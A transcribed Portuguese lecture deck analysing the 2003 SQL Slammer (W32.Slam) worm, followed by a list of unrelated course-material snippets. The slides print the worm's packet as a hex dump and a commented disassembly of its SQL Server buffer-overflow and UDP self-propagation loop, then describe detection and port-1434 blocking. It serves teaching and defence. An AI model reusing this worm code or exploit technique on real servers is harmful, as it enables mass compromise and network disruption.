Criptografia e Segurança das Comunicações. das Comunicações

Tamanho: px
Começar a partir da página:

Download "Criptografia e Segurança das Comunicações. das Comunicações"

Transcrição

1 Curiosidade, não faz parte da avaliação Criptografia e Segurança das Comunicações Análise do verme W32.Slam W32.Slam: 1/21 Introdução (1) O conceito de verme foi divulgado em Em 1988 foi lançado o Morris, o primeiro verme com grande impacto. A 25 janeiro de 2003 foi lançado o verme W32.Slam, também conhecido por Sapphire ou Slammer. Espalhou-se muito rapidamente por usar protocolo de transporte UDP. Registados enormes prejuízos 5 servidores DNS de topo bloqueados. Placa giratória da Continental Airlines em Newark/NJ teve de ser encerrada. Rede ATM do Bank of America com graves disrupções. Telemóveis da Coreia do Sul tornados inoperacionais. Ataque baseado na transposição da memória tampão, uma fraqueza do SQL Server. W32.Slam: 2/21

2 Introdução (2) Pacote ocupa apenas 404B. Cabeçalho IP Cabeçalho UDP cf e630 c0a c0a8 016a 049f 059a 0180 ac8d dc c9b0 42eb 0e ae ae dcc9 b042 b c9b e2fd e e64 6c6c c b65 726e f75 6e b b9 6c6c e f66 b f63 6b66 b974 6f e 64be 1810 ae42 8d45 d450 ff16 508d 45e0 508d 45f0 50ff 1650 be10 10ae 428b 1e8b 033d 558b ec be1c 10ae 42ff 16ff d031 c f b 81f d 45cc 508b 45c0 50ff 166a 116a 026a 02ff d050 8d45 c450 8b45 c050 ff16 89c6 09db 81f3 3c61 d9ff 8b45 b48d 0c40 8d14 88c1 e204 01c2 c1e c28d d b46a 108d 45b c f d b45 50ff d6eb ca Código W32.Slam: 3/21 Cabeçalhos IP/UDP (1) A. Cabeçalho IP Campo Valor Significado Versão (4-IP), IHL (5), Tipo Serviço (0) Comprimento do datagrama 3 cf09 Identificação Bandeiras, offset TTL, Protocolo transporte (11-UDP) 6 e630 Checksum do cabeçalho 7 c0a80164 Endereço IP fonte 8 c0a8016a Endereço IP destino W32.Slam: 4/21

3 Cabeçalhos IP/UDP (2) B. Cabeçalho UDP Campo Valor Significado 1 049f Porto fonte 2 095a Porto destino (1434d - SQL server) Comprimento cabeçalho + dados (384B) 4 ac8d Checksum W32.Slam: 5/21 Código (1) Numa interrogação ao servidor SQL, envia-se 1. Código de interrogação Byte 0x04 2. Identificador da base de dados a interrogar, até 128B que deve ser terminada por 0x00. O W32.Slam não contém 0x00 por forma a transpor ( overflow ) a memória tampão. Depois do 0x04 são colocados 0x01 em número suficiente para acomodar o código do verme e alterar endereço de retorno da rotina do servidor SQL para o código do verme. Entre os 0x01 encontram-se dados inseridos por instruções executadas pelo código do verme. W32.Slam: 6/21

4 Código (2) O programa corre apenas em cima do Windows 32 com servidor SQL. Rotinas da API socket acedidas por bibliotecas dinâmicas (endereços nas tabela IAT). O programa é dividido em quatro etapas: 1. Reconstrução da memória tampão, designadamente para eliminar eventuais 0x00, para poder ser enviada em novo ataque. 2. Recolha de parâmetros para a pilha. 3. Abre um socket e tempo desde arranque do SO. 4. Ciclo infinito 1. Selecciona aleatoriamente endereço IP para novo alvo do ataque. 2. Replica pacote UDP. W32.Slam: 7/21 Código (2) C. Passo 1: Reconstruir buffer, para que possa ser enviado mais tarde no passo 4.2-ciclo sendto() 68DCC9B042 push 0x42b0c9dc ; insere 01h 96 vezes na pilha B mov eax,0x ; 31C9 xor ecx,ecx ; B118 mov cl,0x18 ; FIXUP_PAYLOAD: ; E2FD loop FIXUP_PAYLOAD ; Não pode usar MOV ecx,... porque código não pode conter 00 s! W32.Slam: 8/21

5 Código (3) Passo 2: Carregar parâmetros na pilha ; insere 04h na pilha (código de interrogação ao SQL server) ; 0x xor 0x = 0x xor eax,0x ; Não pode usar MOV eax,... porque código não pode conter 00 s! ; copia ESP para EBP, por forma a poder aceder aos dados inseridos na pilha 89E5 mov ebp,esp ; ; insere string kernel32.dll na pilha ECX ficou com 0 no loop 682E646C6C push dword '.dll' ; 68656C3332 push dword 'el23' ; 686B65726E push dword 'kern' ; W32.Slam: 9/21 Código (4) ; insere string GetTickCount na pilha 686F756E74 push dword 'ount' ; B43 push dword 'ickc' ; push dword 'GetT' ; ; insere string ws2_32.dll na pilha 66B96C6C mov cx, 'll' ; ECX superior continua com E64 push dword '32.d' ; F push dword 'ws2_' ; ; insere string socket na pilha 66B96574 mov cx, 'et' ; ECX superior continua com F636B push dword 'sock' ; W32.Slam: 10/21

6 Código (5) ; insere string sendto na pilha 66B9746F mov cx, 'to' ; ECX superior continua com E64 push dword 'send' ; ; call sqlsort:[iat]->loadlibrary("ws2_32.dll") BE1810AE42 mov esi, 42AE1018h ; endereço da sqlsort.dll na IAT 8D45D4 lea eax,[ebp-0x2c] ; endereço parâmetro "ws2_32.dll" FF16 call dword ptr [esi] ; no EAX está retorno de LoadLibrary ; (base de ws2_32) W32.Slam: 11/21 Código (6) ; call sqlsort:[iat]->loadlibrary("kernel32.dll") 8D45E0 lea eax,[ebp-0x20] ; endereço parâmetro GetTickCount 8D45F0 lea eax,[ebp-0x10] ; endereço parâmetro kernel32.dll FF16 call dword ptr [esi] ; no EAX está retorno de LoadLibrary ; (base de kernel 32) ; Procura entrada GetProcAddress na IAT (Import Address Table), que roda nas ; versões dll, comparando a assinatura dos primeiros 4Bytes. BE1010AE42 mov esi, 42AE1010h ; endereço base da IAT 8B1E mov ebx,[esi] ; ebx<- entrada IAT 8B03 mov eax,[ebx] ; eax<-4b de instruções 3D558BEC51 cmp eax,0x51ec8b55 ; assinatura de GetProcAddress? 7405 jz FOUND_IT ; BE1C10AE42 mov esi,0x42ae101c ; entrada IAT passa a GetProcAddress W32.Slam: 12/21

7 Código (7) Passo 3: Abrir socket e recolher tempo desde arranque do SO. FOUND_IT: ; GetProcAddress(kernel32_base,GetTickCount) FF16 call dword ptr [esi] ; ; GetTickCount() FFD0 call eax ; no EAX estão milisegundos ; desde o início sistema (para ; semente do gerador aleatório) ; carrega parâmetros para a pilha 31C9 xor ecx,ecx ; ecx<-0 Não pode usar MOV ecx,0 porque código não pode conter 00 s! salva semente W32.Slam: 13/21 Código (8) 81F B xor ecx,0x9b ; 0x9B xor 0x = 81F xor ecx,0x9b ; 0x9A ; (port=1234/ family=af_inet) ; GetProcAddress(ws2_32,socket) Não pode usar MOV ecx,... porque código não pode conter 00 s! 8D45CC lea eax,[ebp-0x34] ; endereço parâmetro socket 8B45C0 mov eax,[ebp-0x34] ; endereço base ws2_32 FF16 call dword ptr [esi] ; W32.Slam: 14/21

8 Código (9) ; socket(af_inet, SOCK_DGRAM,IPPROTO_UDP) 6A11 push 0x11h ; 6A02 push 0x02h ; 6A02 push 0x02h ; FFD0 call eax ; ; GetProcAddress(ws2_32,sendto) 8D45C4 lea eax,[ebp-0x3c] ; endereço parâmetro sendto 8B45C0 mov eax,[ebp-0x40] ; endereço base de ws2_32 FF16 call dword ptr [esi] ; 89C6 mov esi,eax ; W32.Slam: 15/21 Código (10) Passo 4.1: Seleccionar aleatoriamente um endereço IP Autor tentou usar o gerador congruente linear X n+1 = (214013X n ) mod 2 32 Na implementação cometeu 2 lapsos: Limpeza de ebx feita com OR, quando deve ser feita com XOR. Resultado: o sal é 0x ou 0x ! Incremento codificado por 0xffd9613c, equivalente a : a negação é complemento para 2, faltou adicionar 1! Usou instrução ADD, quando devia usar SUB por causa do valor negativo! Resultado: o incremento é sempre par! W32.Slam: 16/21

9 Código (11) 09DB or ebx,ebx ; 81F33C61D9FF xor ebx,0xffd9613c ; ebx<-0x ou 0x ; conforme versão dll PSEUDO_RAND_SEND: 8B45B4 mov eax,[ebp-0x4c] ; carrega semente ; determina novo endereço IP 8D0C40 lea ecx,[eax+eax*2] ; 8D1488 lea edx,[eax+ecx*4] ; C1E204 shl edx,0x4 ; 01C2 add edx,eax ; C1E208 shl edx,0x8 ; 29C2 sub edx,eax ; 8D0490 lea eax,[eax+edx*4] ; 01D8 add eax,ebx ; 8945B4 mov [ebp-0x4c],eax ; guarda novo endereço IP na ; estrutura sock_addr W32.Slam: 17/21 Código (12) Passo 4.2: Enviar pacote UDP ; sendto(sock,payload,376,0,sock_addr struct,16) 6A10 push 0x10h ; 8D45B0 lea eax,[ebp-0x50] ; carrega endereço sock_addr 31C9 xor ecx,ecx ; ecx<-0 Não pode usar MOV ecx,0 porque código não pode conter 00 s! 6681F17801 xor cx,0x178 ; comprimento carga = 376B 8D4503 lea eax,[ebp+0x3] ; endereço da carga 8B45AC mov eax,[ebp-0x54] ; FFD6 call esi ; ; fecha ciclo EBCA jmp PSEUDO_RAND_SEND W32.Slam: 18/21

10 Trafego gerado Devido ao ciclo curto e transporte pelo protocolo UDP, o trafego cresceu exponencialmente limitado apenas pela capacidade da rede. América do Norte 12:45 EST Asia Europa W32.Slam: 19/21 Combate (1) O W32.Slam foi rapidamente detectado pelo enorme incremento de tráfego. A inspecção do cabeçalho UDP permitiu identificar ao fim de 1 hora o porto de transmissão, tendo os supervidores da rede contactado administradores para fechar a porta. Depois todos os administradores instalaram o patch da Microsoft, que tinham sido previamente publicitado. Os restantes portos mantiveram-se operacionais sendo os serviços afectados apenas pela saturação de tráfego por parte dos pacotes UDP do W32.Slam. W32.Slam: 20/21

11 Combate (2) MS SQL WORM IS DESTROYING INTERNET BLOCK PORT 1434! From: Michael Bacarella <mbac () netgraft com> Date: Sat, 25 Jan :11: I'm getting massive packet loss to various points on the globe. I am seeing a lot of these in my tcpdump output on each host. 02:06: > ms-sql-m: udp :06: > : icmp: udp port ms-sql-m unreachable [tos0xc0 It looks like there's a worm affecting MS SQL Server which is pingflooding addresses at some random sequence. All admins with access to routers should block port 1434 (ms-sql-m)! Everyone running MS SQL Server shut it the hell down or make sure it can't access the internet proper! I make no guarantees that this information is correct, test it out for yourself! -- Michael Bacarella 24/7 phone: Netgraft Corporation "unique technologies to empower your business" W32.Slam: 21/21

Redes Locais. Prof. Luiz Carlos B. Caixeta Ferreira

Redes Locais. Prof. Luiz Carlos B. Caixeta Ferreira Redes Locais. Prof. Luiz Carlos B. Caixeta Ferreira 5. Ethernet 5.1 Introdução 5.2 LLC (Logical Link Control) 5.3 MAC (Media Access Control) 5.4 Sistemas de Endereçamento 5.5 Quadros Ethernet 5.6 Codificação

Leia mais

Instruções funcionamento em 16 bits. 8B bytes W Mod 000 r/m

Instruções funcionamento em 16 bits. 8B bytes W Mod 000 r/m Instruções funcionamento em 6 bits 0 a bytes Mov BYTE PTR [BX], 06h 00 0W Mod 000 r/m 0000 00 0 0 0 8A 07 06 3 bytes 00 8B 07 06 00 4 bytes 00 0W Mod 000 r/m 000 00 0000 0000 Mov WORD PTR [BX], 06h Instruções

Leia mais

Programação ao nível da máquina. Operações lógicas e aritméticas

Programação ao nível da máquina. Operações lógicas e aritméticas Programação ao nível da máquina Operações lógicas e aritméticas Operações lógicas e aritméticas Operações: aritméticas: add, sub, inc, dec, cmp lógicas: and, or, xor, not Realizadas pela ALU (Arithmetic

Leia mais

http://www.risesecurity.org Rodrigo Rubira Branco rodrigo@kernelhacking.com rodrigo@risesecurity.org

http://www.risesecurity.org Rodrigo Rubira Branco rodrigo@kernelhacking.com rodrigo@risesecurity.org Ataques Polimórficos Rodrigo Rubira Branco rodrigo@kernelhacking.com rodrigo@risesecurity.org A idéia - Detectores de intrusos utilizam-se de assinaturas de ataques para identificação dos mesmos - Sistemas

Leia mais

Redes de Computadores 2008 Primeiro Trabalho Analisador de Redes

Redes de Computadores 2008 Primeiro Trabalho Analisador de Redes Redes de Computadores 2008 Primeiro Trabalho Analisador de Redes Prof. Ronaldo Alves Ferreira 1 Descrição do Trabalho Analisadores de redes são ferramentas de enorme valor para a depuração de protocolos

Leia mais

Software de Telecomunicações. Ferramentas de protecção. Prof RG Crespo Software de Telecomunicações Protecção : 1/15

Software de Telecomunicações. Ferramentas de protecção. Prof RG Crespo Software de Telecomunicações Protecção : 1/15 Software de Telecomunicações Ferramentas de protecção Prof RG Crespo Software de Telecomunicações Protecção : 1/15 Detecção de virus (1) No mercado existem programas dedicado à detecção e erradicação de

Leia mais

Redes de Computadores

Redes de Computadores Redes de Computadores CAMADA DE REDE DHCP NAT IPv6 Slide 1 Protocolo DHCP Protocolo de Configuração Dinâmica de Hospedeiros (Dynamic Host Configuration Protocol DHCP), RFC 2131; Obtenção de endereço de

Leia mais

Redes de Computadores. Trabalho de Laboratório Nº2

Redes de Computadores. Trabalho de Laboratório Nº2 Redes de Computadores Curso de Eng. Informática Curso de Eng. de Electrónica e Computadores Trabalho de Laboratório Nº2 Configuração de TCP/IP numa rede de computadores Utilização de Ipconfig, Ping e Tracert

Leia mais

Teleprocessamento e Redes

Teleprocessamento e Redes Teleprocessamento e Redes Aula 23: (laboratório) 13 de julho de 2010 1 2 3 ICMP HTTP DNS TCP 4 nslookup Sumário Permite fazer requisições a um servidor DNS O nslookup envia uma requisição para o servidor,

Leia mais

Ping. O programa Ping, opção de record route e de timestamp.

Ping. O programa Ping, opção de record route e de timestamp. Ping O programa Ping, opção de record route e de timestamp. Ping Testa se um outro terminal se encontra atingível O programa envia uma mensagem ICMP echo request para um terminal e espera por receber uma

Leia mais

Capítulo 7 CAMADA DE TRANSPORTE

Capítulo 7 CAMADA DE TRANSPORTE Capítulo 7 CAMADA DE TRANSPORTE SERVIÇO SEM CONEXÃO E SERVIÇO ORIENTADO À CONEXÃO Serviço sem conexão Os pacotes são enviados de uma parte para outra sem necessidade de estabelecimento de conexão Os pacotes

Leia mais

Assembly na arquitetura IA-32 com NASM no Linux

Assembly na arquitetura IA-32 com NASM no Linux Assembly na arquitetura IA-32 com NASM no Linux Prof. Dr. Luciano José Senger 1 Introdução A Figura 1 mostra os registradores principais para a arquitetura IA-32. Essa arquitetura trabalha com palavras

Leia mais

1. Capturando pacotes a partir da execução do traceroute

1. Capturando pacotes a partir da execução do traceroute Neste laboratório, iremos investigar o protocolo IP, focando o datagrama IP. Vamos fazê-lo através da analise de um trace de datagramas IP enviados e recebidos por uma execução do programa traceroute (o

Leia mais

Redes de Computadores I - Protocolos de Controle: ICMP. por Helcio Wagner da Silva

Redes de Computadores I - Protocolos de Controle: ICMP. por Helcio Wagner da Silva Redes de Computadores I - Protocolos de Controle: ICMP por Helcio Wagner da Silva Introdução Na Internet, cada roteador opera de maneira autônoma X X X X 2 Introdução Infelizmente, nada funciona corretamente

Leia mais

UNIVERSIDADE. Sistemas Distribuídos

UNIVERSIDADE. Sistemas Distribuídos UNIVERSIDADE Sistemas Distribuídos Ciência da Computação Prof. Jesus José de Oliveira Neto Comunicação Inter-Processos Sockets e Portas Introdução Sistemas distribuídos consistem da comunicação entre processos

Leia mais

Arquitetura TCP/IP. Parte VI Entrega de pacotes sem conexão (IP) Fabrízzio Alphonsus A. M. N. Soares

Arquitetura TCP/IP. Parte VI Entrega de pacotes sem conexão (IP) Fabrízzio Alphonsus A. M. N. Soares Arquitetura TCP/IP Parte VI Entrega de pacotes sem conexão (IP) Fabrízzio Alphonsus A. M. N. Soares Tópicos Conceitos Pacote (ou datagrama) IP Formato Campos do cabeçalho Encapsulamento Fragmentação e

Leia mais

Redes. Entenda o que são ICMP, ping e traceroute Autor: Hélder Garcia Email: hlbognfspam@sounerd.com Março de 2004

Redes. Entenda o que são ICMP, ping e traceroute Autor: Hélder Garcia Email: hlbognfspam@sounerd.com Março de 2004 Entenda o que são ICMP, ping e traceroute Autor: Hélder Garcia Email: hlbognfspam@sounerd.com Março de 2004 O ICMP - - é um protocolo que faz parte da pilha TCP/IP, enquadrando-se na camada de rede (nível

Leia mais

Ataques para obtenção de informações

Ataques para obtenção de informações Ataques para obtenção de informações Técnicas: Dumpster diving ou Trashing Engenharia Social Eavesdropping ou Packet Sniffing Scanning War dialing Firewalking Ataques para obtenção de informações Dumpster

Leia mais

Arquitetura de Computadores. Prof. João Bosco Jr.

Arquitetura de Computadores. Prof. João Bosco Jr. Arquitetura de Computadores Prof. João Bosco Jr. Unidade II Aula 1 Nível ISA Posicionado entre a microarquitetura e o SO Define a arquitetura (Conjunto de Instruções) É a interface entre o Software e o

Leia mais

CAPÍTULO 7 NÍVEL DE LINGUAGEM DE MONTAGEM

CAPÍTULO 7 NÍVEL DE LINGUAGEM DE MONTAGEM CAPÍTULO 7 NÍVEL DE LINGUAGEM DE MONTAGEM 71 Introdução Difere dos níveis inferiores por ser implementado por tradução A tradução é usada quando um processador está disponível para uma mensagem fonte mas

Leia mais

Programação 2008/2009 MEEC Guia de instalação do PC de programação

Programação 2008/2009 MEEC Guia de instalação do PC de programação Programação 2008/2009 MEEC Guia de instalação do PC de programação Requisitos: PC 1Gbyte de memória Windows, Linux ou Mac OS X. Aplicação Virtualbox. (www.virtualbox.org) O uso de máquinas virtuais permite

Leia mais

Guia de Instalação SIAM. Internet Information Services - IIS 5.1 no Windows XP Pro

Guia de Instalação SIAM. Internet Information Services - IIS 5.1 no Windows XP Pro Guia de Instalação SIAM Internet Information Services - IIS 5.1 no Windows XP Pro Documento Gerado por: Amir Bavar Criado em: 06/04/2007 Última modificação: 26/09/2008 Índice: 1. Introdução 2. Lista de

Leia mais

Periféricos e Interfaces Ano lectivo 2003/2004 Docente: Ana Paula Costa. Aula Teórica 11

Periféricos e Interfaces Ano lectivo 2003/2004 Docente: Ana Paula Costa. Aula Teórica 11 Sumário: O disco rígido e a disquete estrutura física. Como os dados são armazenados fisicamente. Como o MS-DOS organiza o disco. O registo de boot. Aula Teórica 11 Leitura Recomendada: Capítulos 28 e

Leia mais

OneTouch ZOOM Pro Diabetes Management Software. Guia de Instalação. Procedimento de instalação

OneTouch ZOOM Pro Diabetes Management Software. Guia de Instalação. Procedimento de instalação OneTouch ZOOM Pro Diabetes Management Software com SnapShot Guia de Instalação Procedimento de instalação 1. Insira o CD de instalação do OneTouch Zoom Pro na unidade de CD-ROM. NOTA: Se instalar o programa

Leia mais

ICMP Internet Control Message Protocol

ICMP Internet Control Message Protocol TCP UDP ICMP Internet Control Message Protocol ARP IP ICMP Acesso à rede Funcionalidade Mensagens ICMP Internet Control Message Protocol - ICMP Funcionalidades Informar máquina de origem da ocorrência

Leia mais

Arquitetura de Computadores. Tipos de Instruções

Arquitetura de Computadores. Tipos de Instruções Arquitetura de Computadores Tipos de Instruções Tipos de instruções Instruções de movimento de dados Operações diádicas Operações monádicas Instruções de comparação e desvio condicional Instruções de chamada

Leia mais

Introdução à Arquitetura e Linguagem Assembly de Processadores IA-32

Introdução à Arquitetura e Linguagem Assembly de Processadores IA-32 Introdução à Arquitetura e Linguagem Assembly de Processadores IA-32 Sistemas da Computação Prof. Rossano Pablo Pinto, Msc. rossano at gmail com 2 semestre 2007 CHIP Ano MHz Transistors Mem 8086 1978 5

Leia mais

Redes de Computadores II

Redes de Computadores II Redes de Computadores II UDP Prof: Ricardo Luís R. Peres Tem como objetivo prover uma comunicação entre dois processos de uma mesma sessão que estejam rodando em computadores dentro da mesma rede ou não.

Leia mais

A arquitectura IA32. A arquitectura de um processador é caracterizada pelo conjunto de atributos que são visíveis ao programador.

A arquitectura IA32. A arquitectura de um processador é caracterizada pelo conjunto de atributos que são visíveis ao programador. A arquitectura IA32 A arquitectura de um processador é caracterizada pelo conjunto de atributos que são visíveis ao programador. Tamanho da palavra Número de registos visíveis Número de operandos Endereçamento

Leia mais

Redes de Computadores I Licenciatura em Eng. Informática e de Computadores 1 o Semestre, 26 de Outubro de 2005 1 o Teste A

Redes de Computadores I Licenciatura em Eng. Informática e de Computadores 1 o Semestre, 26 de Outubro de 2005 1 o Teste A Redes de Computadores I Licenciatura em Eng. Informática e de Computadores 1 o Semestre, 26 de Outubro de 2005 1 o Teste A Número: Nome: Duração: 1 hora O teste é sem consulta O teste deve ser resolvido

Leia mais

Redes de Computadores

Redes de Computadores Redes de Computadores Prof. Marcelo Gonçalves Rubinstein Programa de Pós-Graduação em Engenharia Eletrônica Faculdade de Engenharia Universidade do Estado do Rio de Janeiro Ementa Introdução a Redes de

Leia mais

LABORATÓRIO DE LINGUAGEM DE MONTAGEM INTERRUPÇÕES DO DOS E DA BIOS

LABORATÓRIO DE LINGUAGEM DE MONTAGEM INTERRUPÇÕES DO DOS E DA BIOS LABORATÓRIO DE LINGUAGEM DE MONTAGEM INTERRUPÇÕES DO DOS E DA BIOS Capítulo 15 do livro-texto, págs. 309 a 330 Impressora Scanner Monitor Flop Disk Modem Floppy drive "CPU" HD CD ROM Teclado Mouse Dispositivos

Leia mais

Redes de Computadores. Trabalho de Laboratório Nº7

Redes de Computadores. Trabalho de Laboratório Nº7 Redes de Computadores Curso de Eng. Informática Curso de Eng. de Electrónica e Computadores Trabalho de Laboratório Nº7 Análise do tráfego na rede Protocolos TCP e UDP Objectivo Usar o Ethereal para visualizar

Leia mais

Laboratório de Sistemas Processadores e Periféricos Lista de comandos de Assembly

Laboratório de Sistemas Processadores e Periféricos Lista de comandos de Assembly Laboratório de Sistemas Processadores e Periféricos Lista de comandos de Assembly Gustavo G. Parma Lista dos comandos assembly que serão utilizados ao longo das práticas. 1 Comandos 1. ADD destino, fonte

Leia mais

Protocolos, DNS, DHCP, Ethereal e comandos em Linux

Protocolos, DNS, DHCP, Ethereal e comandos em Linux Redes de Computadores Protocolos, DNS, DHCP, Ethereal e comandos em Linux Escola Superior de Tecnologia e Gestão Instituto Politécnico de Bragança Março de 2006 Endereços e nomes Quaisquer duas estações

Leia mais

Licenciatura em Eng.ª Informática Complementos de Redes - 3º Ano - 2º Semestre. Trabalho Nº 4 - VoIP

Licenciatura em Eng.ª Informática Complementos de Redes - 3º Ano - 2º Semestre. Trabalho Nº 4 - VoIP Trabalho Nº 4 - VoIP 1. Introdução A utilização de tecnologia VoIP como alternativa às redes telefónicas tradicionais está a ganhar cada vez mais a aceitação junto dos utilizadores, e está sobretudo em

Leia mais

- O MySQL para além da sua utilização em modo linha de comandos, também pode ser utilizado através de ferramentas gráficas.

- O MySQL para além da sua utilização em modo linha de comandos, também pode ser utilizado através de ferramentas gráficas. Objetivo: Utilização das ferramentas gráficas do MySQL Instalação das ferramentas gráficas do MySQL: - O MySQL para além da sua utilização em modo linha de comandos, também pode ser utilizado através de

Leia mais

Sistemas Operacionais. Prof. M.Sc. Sérgio Teixeira. Aula 03 Conceitos de Hardware e Software parte 01. Cursos de Computação

Sistemas Operacionais. Prof. M.Sc. Sérgio Teixeira. Aula 03 Conceitos de Hardware e Software parte 01. Cursos de Computação Cursos de Computação Sistemas Operacionais Prof. M.Sc. Sérgio Teixeira Aula 03 Conceitos de Hardware e Software parte 01 Referência: MACHADO, F.B. ; MAIA, L.P. Arquitetura de Sistemas Operacionais. 4.ed.

Leia mais

SEG. EM SISTEMAS E REDES. 03. Vulnerabilidades em redes. Prof. Ulisses Cotta Cavalca <ulisses.cotta@gmail.com>

SEG. EM SISTEMAS E REDES. 03. Vulnerabilidades em redes. Prof. Ulisses Cotta Cavalca <ulisses.cotta@gmail.com> SEG. EM SISTEMAS E REDES 03. Vulnerabilidades em redes Prof. Ulisses Cotta Cavalca Belo Horizonte/MG 2015 SUMÁRIO 1) Vulnerabilidades em redes 2) Dicionário de vulnerabilidades

Leia mais

Redes de Computadores

Redes de Computadores 8. Segurança de Rede DIN/CTC/UEM 2008 : o que é? Dispositivo que permite conectividade segura entre redes (interna e externa) com vários graus de confiabilidade Utilizado para implementar e impor as regras

Leia mais

Wireshark Lab: IP. Versão 1.1 2005 KUROSE, J.F & ROSS, K. W. Todos os direitos reservados 2011 BATISTA, O. M. N. Tradução e adaptação para Wireshark.

Wireshark Lab: IP. Versão 1.1 2005 KUROSE, J.F & ROSS, K. W. Todos os direitos reservados 2011 BATISTA, O. M. N. Tradução e adaptação para Wireshark. Wireshark Lab: IP Versão 1.1 2005 KUROSE, J.F & ROSS, K. W. Todos os direitos reservados 2011 BATISTA, O. M. N. Tradução e adaptação para Wireshark. Neste laboratório, investigaremos o Internet Protocol

Leia mais

Arquitectura de Computadores II. Medição de desempenho

Arquitectura de Computadores II. Medição de desempenho Arquitectura de Computadores II LESI - 3º Ano Medição de desempenho João Luís Ferreira Sobral Departamento do Informática Universidade do Minho Abril 2002 1. Introdução A medição de desempenho pretende

Leia mais

Componentes de um sistema de firewall - I

Componentes de um sistema de firewall - I Componentes de um sistema de firewall - I O que são Firewalls? Os firewalls são sistemas de segurança que podem ser baseados em: um único elemento de hardware; um único elemento de software instalado num

Leia mais

MANUAL DE INSTALAÇÃO E PROGRAMAÇÃO CONVERSOR - IP / USB / SERIAL - 317 RV1

MANUAL DE INSTALAÇÃO E PROGRAMAÇÃO CONVERSOR - IP / USB / SERIAL - 317 RV1 MANUAL DE INSTALAÇÃO E PROGRAMAÇÃO CONVERSOR - IP / USB / SERIAL - 317 RV1 SÃO CAETANO DO SUL 06/06/2014 SUMÁRIO Descrição do Produto... 3 Características... 3 Configuração USB... 4 Configuração... 5 Página

Leia mais

Software de segurança em redes para monitoração de pacotes em uma conexão TCP/IP

Software de segurança em redes para monitoração de pacotes em uma conexão TCP/IP Software de segurança em redes para monitoração de pacotes em uma conexão TCP/IP Paulo Fernando da Silva psilva@senior.com.br Sérgio Stringari stringari@furbbr Resumo. Este artigo apresenta a especificação

Leia mais

Programação de Sockets em C/C++

Programação de Sockets em C/C++ Programação de Sockets em C/C++ Redes de Comunicação 2011/2012 1 Programação de Sockets em C/C++ 2 TCP 3 UDP Introdução Os sockets são um método de criar conexão entre processos, independente do protocolo.

Leia mais

Fernando Albuquerque - fernando@cic.unb.br ADMINISTRAÇÃO TCP/IP. Fernando Albuquerque 061-2733589 fernando@cic.unb.br

Fernando Albuquerque - fernando@cic.unb.br ADMINISTRAÇÃO TCP/IP. Fernando Albuquerque 061-2733589 fernando@cic.unb.br ADMINISTRAÇÃO TCP/IP Fernando Albuquerque 061-2733589 fernando@cic.unb.br Protocolos TCP/IP - Tópicos Introdução IP Endereçamento Roteamento UDP, TCP Telnet, FTP Correio DNS Web Firewalls Protocolos TCP/IP

Leia mais

CONSTRUÇÃO DE UMA UCP HIPOTÉTICA M++ INTRODUÇÃO

CONSTRUÇÃO DE UMA UCP HIPOTÉTICA M++ INTRODUÇÃO CONSTRUÇÃO DE UMA UCP HIPOTÉTICA M++ INTRODUÇÃO O seguinte artigo apresenta uma UCP hipotética construída no software simulador DEMOWARE Digital Works 3.04.39. A UCP (Unidade Central de Processamento)

Leia mais

Usando o Nmap. A instalação do Nmap é bem simples. Após obter o código fonte execute os comandos abaixo: tar xjvpf nmap-3.48.tar.bz2 cd nmap-3.

Usando o Nmap. A instalação do Nmap é bem simples. Após obter o código fonte execute os comandos abaixo: tar xjvpf nmap-3.48.tar.bz2 cd nmap-3. Usando o Nmap Este artigo irá explicar como instalar e utilizar algumas funções do Nmap. Todos os comandos foram testados com a versão 3.48 do Nmap. É bem provável que alguns comandos não funcionem em

Leia mais

Curso de especialização em Teleinformática Disciplina Sistemas Distribuídos Prof. Tacla

Curso de especialização em Teleinformática Disciplina Sistemas Distribuídos Prof. Tacla - 1 - - 2 - COMUNICAÇÃO INTER PROCESSOS DISTRIBUÍDOS. - 3 - - 4 - Os sockets UDP e TCP são a interface provida pelos respectivos protocolos. Pode-se dizer que estamos no middleware de sistemas distribuídos

Leia mais

PÉGASUS (ETHERNET POCKET) STUDIO V1.00 MANUAL DE INSTALAÇÃO E OPERAÇÃO

PÉGASUS (ETHERNET POCKET) STUDIO V1.00 MANUAL DE INSTALAÇÃO E OPERAÇÃO PÉGASUS (ETHERNET POCKET) STUDIO V1.00 MANUAL DE INSTALAÇÃO E OPERAÇÃO Rua Coronel Botelho, 64 - Alto da Lapa - CEP: 05088-020 São Paulo - SP - Brasil +55 (11) 3832-6102 PÉGASUS (ETHERNET POCKET) STUDIO

Leia mais

Evolução dos Processadores

Evolução dos Processadores Evolução dos Processadores Arquitetura Intel Arquitetura x86 Micro Arquitetura P5 P6 NetBurst Core Processador Pentium Pentium Pro Pentium II Pentium III Pentium 4 Pentium D Xeon Xeon Sequence Core 2 Duo

Leia mais

GIAE VERSÃO 2.1.1 28 JUNHO DE 2011 MUITO IMPORTANTE

GIAE VERSÃO 2.1.1 28 JUNHO DE 2011 MUITO IMPORTANTE GIAE VERSÃO 2.1.1 28 JUNHO DE 2011 MUITO IMPORTANTE Devido a um bug detectado no motor da base de dados, situação agora corrigida pelo fabricante, esta nova actualização do GIAE é disponibilizada numa

Leia mais

Programação com sockets (em Java)

Programação com sockets (em Java) com sockets (em Java) Prof. Dr. Julio Arakaki Depto. Ciência da 1 Comunicação entre processos // aplicações - é um dos mecanismos mais utilizados - Java oferece modos de utilização:. TCP ( Transmission

Leia mais

ECD1200 Equipamento de Consulta de Dados KIT DE DESENVOLVIMENTO

ECD1200 Equipamento de Consulta de Dados KIT DE DESENVOLVIMENTO Equipamento de Consulta de Dados KIT DE DESENVOLVIMENTO Versão do documento: 1.1 1. Introdução...3 2. Documentação...3 2.1. DOCUMENTAÇÃO DE REFERÊNCIA... 3 2.2. DESCRIÇÃO FUNCIONAL... 4 2.2.1. INTERFACE...

Leia mais

Interconexão de Redes Parte 2. Prof. Dr. S. Motoyama

Interconexão de Redes Parte 2. Prof. Dr. S. Motoyama Interconexão de Redes Parte 2 Prof. Dr. S. Motoyama 1 Software IP nos hosts finais O software IP nos hosts finais consiste principalmente dos seguintes módulos: Camada Aplicação; DNS (Domain name system)

Leia mais

Criptografia e Segurança de Comunicações. Comunicações SPAM

Criptografia e Segurança de Comunicações. Comunicações SPAM Curiosidade, não faz parte da avaliação Criptografia e Segurança de Comunicações SPAM SPAM : 1/10 SPAM introdução (1) SPAM 1 mensagem Email não solicitada, dividida por Boato ( Hoax ): história falsa para

Leia mais

18/05/2014. Problemas atuais com o IPv4

